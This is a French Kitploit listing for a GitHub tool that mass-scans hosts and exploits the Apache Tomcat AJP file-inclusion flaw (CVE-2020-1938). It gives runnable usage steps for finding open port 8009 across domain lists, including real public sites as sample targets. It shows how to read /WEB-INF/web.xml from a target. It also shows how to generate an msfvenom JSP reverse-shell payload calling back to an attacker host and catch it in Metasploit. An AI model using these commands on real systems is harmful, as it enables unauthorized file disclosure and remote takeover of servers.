Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CNVD-2020-10487 — Outils de détection CVE-2020-1938 / CNVD-2020-1048 | Kitploit
Outils/GitHubGitHub/doggycheng/cnvd-2020-10487
Scanners de VulnérabilitésExploitationShellcodeExploitation d'Applications WebTests d'IntrusionDéveloppement de Charges Utiles
GitHubdoggycheng/cnvd-2020-10487

CNVD-2020-10487

Outils de détection CVE-2020-1938 / CNVD-2020-1048

Voir le dépôt
861il y a 6 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Description

L'outil est destiné uniquement à la recherche en sécurité et aux audits internes. Il est interdit d'utiliser l'outil pour lancer des attaques illégales. Les conséquences sont à la charge de l'utilisateur.

Outil de détection en masse pour la vulnérabilité d'inclusion de fichier Apache Tomcat (CVE-2020-1938 / CNVD-2020-1048).

Ce projet est basé sur le projet de Kit4y avec des modifications.

Modifications du code

Lorsque ip.txt ne contient qu'un seul nom de domaine ou IP, threadCount est défini à 1, ce qui empêche le programme de s'exécuter. Code ajouté pour vérifier le nombre de threads :

root@kitploit:~
...
if threadCount == 1:
    threadCount = 2
for i in range(0,threadCount-1):
...
Quelques modifications pour la compatibilité Python3. Code avant modification :
root@kitploit:~
self.stream = self.socket.makefile("rb", bufsize=0)
root@kitploit:~
print("".join([d.data for d in data]))
Code après modification :
root@kitploit:~
if sys.version_info < (3, 0):
    self.stream = self.socket.makefile("rb", bufsize=0)
else:
    self.stream = self.socket.makefile("rb", buffering=None)
root@kitploit:~
if sys.version_info < (3, 0):
    print("".join([d.data for d in data]))
else:
    print(b"".join([d.data for d in data]).decode("UTF-8"))

Utilisation

Détection en masse

1. Placez les noms de domaine/IP à analyser dans ip.txt, par exemple :

127.0.0.1
www.baidu.com


www.google.com

2. python threading-find-port-8009.py

Analyse les noms de domaine/IP dans ip.txt pour trouver ceux qui ont le port 8009 ouvert, et les enregistre dans le fichier 8009.txt généré.

3. python threading-CNVD-2020-10487-Tomcat-Ajp-lfi.py

Filtre les URL vulnérables depuis 8009.txt et les place dans vul.txt. Les noms de domaine présents dans vul.txt sont ceux qui sont vulnérables.

Détection d'un seul site

python CNVD-2020-10487-Tomcat-Ajp-lfi.py target.com

python CNVD-2020-10487-Tomcat-Ajp-lfi.py -f /WEB-INF/web.xml 192.168.125.128

python CNVD-2020-10487-Tomcat-Ajp-lfi.py -f /index.jsp 192.168.125.128

Dépassement de répertoire et reverse shell

Par défaut, il lit le dossier ROOT sous webapps. Modifier '/asdf' en '/test/asdf' permet d'accéder au contenu du répertoire test sous webapps.

root@kitploit:~
t.perform_request('/asdf',attributes=[

Si le serveur a également une vulnérabilité de téléchargement de fichier, téléchargez le shell.txt ci-dessous :

root@kitploit:~
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.125.130 LPORT=4444 > shell.txt

Modifiez '/asdf' en '/asdf.jsp', lancez MSF, puis utilisez l'outil PoC pour obtenir un shell.

Autres outils associés

https://github.com/0nise/CVE-2020-1938
https://github.com/hypn0s/AJPy
https://github.com/00theway/Ghostcat-CNVD-2020-10487

Télécharger l’outil